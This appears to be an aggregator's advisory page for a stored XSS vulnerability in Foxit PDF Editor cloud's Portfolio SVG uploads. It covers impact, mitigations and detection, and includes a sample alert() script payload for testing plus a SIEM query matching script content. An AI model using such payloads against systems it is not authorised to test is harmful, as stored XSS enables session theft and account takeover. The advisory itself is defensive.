CVE-2025-66520 – A stored XSS vulnerability in Foxit PDF Editor ... (How to Fix)

Q: What is the severity of CVE-2025-66520?

CVE-2025-66520 has a CVSS score of 6.3 (MEDIUM). A stored XSS vulnerability in Foxit PDF Editor cloud's Portfolio feature allows attackers to upload malicious SVG files containing embedded HTML/JavaScript. When other users view the Portfolio file list, the malicious code executes in their browser context. This affects all users of Foxit PDF Editor cloud who have access to the Portfolio feature.

📋 TL;DR

A stored XSS vulnerability in Foxit PDF Editor cloud's Portfolio feature allows attackers to upload malicious SVG files containing embedded HTML/JavaScript. When other users view the Portfolio file list, the malicious code executes in their browser context. This affects all users of Foxit PDF Editor cloud who have access to the Portfolio feature.

💻 Affected Systems

Products:

Foxit PDF Editor Cloud

Versions: All versions prior to patch

Operating Systems: All

Default Config Vulnerable: ⚠️ Yes

Notes: Only affects the cloud version at pdfonline.foxit.com; desktop versions are not affected.

📦 What is this software?

Pdf Editor Cloud by Foxit

View all CVEs affecting Pdf Editor Cloud →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could steal session cookies, perform account takeover, redirect users to malicious sites, or perform actions on behalf of authenticated users.

🟠

Likely Case

Attackers steal session tokens or credentials, leading to unauthorized access to user accounts and sensitive documents.

🟢

If Mitigated

With proper input validation and output encoding, malicious SVG content would be neutralized before rendering.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: LIKELY

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires authenticated access to upload SVG files, but the payload executes for all users viewing the Portfolio.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Check vendor advisory for specific version

Vendor Advisory: https://www.foxit.com/support/security-bulletins.html

Restart Required: No

Instructions:

1. Visit Foxit security bulletins page. 2. Locate advisory for CVE-2025-66520. 3. Follow vendor instructions for cloud service update.

🔧 Temporary Workarounds

Disable SVG uploads

all

Configure the application to block SVG file uploads in Portfolio feature

Content Security Policy

all

Implement strict CSP headers to block inline script execution

🧯 If You Can't Patch

Disable Portfolio feature entirely until patched
Implement WAF rules to detect and block malicious SVG content

🔍 How to Verify

Check if Vulnerable:

Test by uploading an SVG file with simple JavaScript payload (e.g., <script>alert('XSS')</script>) to Portfolio and checking if it executes when viewed.

Check Version:

Check application version in account settings or contact Foxit support for cloud version information.

Verify Fix Applied:

After vendor update, repeat the test with malicious SVG; payload should be sanitized and not execute.

📡 Detection & Monitoring

Log Indicators:

Unusual SVG file uploads
Multiple failed upload attempts with script-like content
User sessions accessing unexpected external domains

Network Indicators:

Outbound connections to suspicious domains from Portfolio pages
Unexpected POST requests with SVG content

SIEM Query:

source="foxit-cloud" AND (file_type="svg" OR file_extension="svg") AND (content CONTAINS "<script>" OR content CONTAINS "javascript:")

📊 Metadata

CVE ID: CVE-2025-66520

CVSS v3 Score: 6.3 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N

CWE: CWE-79

EPSS Score: 0.04% exploit probability (10.9th percentile)

Published: December 19, 2025

Last Updated: December 23, 2025

🔗 References

https://www.foxit.com/support/security-bulletins.html Vendor Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-66520, you might also want to check these: